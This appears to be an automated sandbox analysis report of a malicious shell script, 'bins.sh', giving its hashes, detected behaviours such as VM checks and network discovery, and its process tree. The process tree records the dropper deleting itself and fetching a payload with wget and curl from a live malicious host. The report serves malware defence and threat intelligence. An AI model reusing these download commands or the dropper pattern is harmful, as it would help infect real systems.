Analysis
-
max time kernel
149s -
max time network
8s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-10-2024 02:33
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
983c1aa3002db7f82617b43cd659c581
-
SHA1
a4ed5b9527c45f8fd2926606512bf3fae46a8380
-
SHA256
7ac05c613144c5e909cdf1cd4d39f6445cc999325f50bce1e855f19898bef53e
-
SHA512
fcbd08abb414f0d1f3646716b05cbe474c72be6c996655a22929a8e1e301683dc6c77b909137408dd0daa0c9420bf9eb68102a16ec7cbbaab28f1bb9b349fbd5
-
SSDEEP
192:0cW/YP+yrXApp3eK9Xk8RrXAppreK9Xk8oY:0cW/YmteK9Xk86eK9Xk89
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
curldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:644
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR2⤵
- System Network Configuration Discovery
PID:652
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:658
-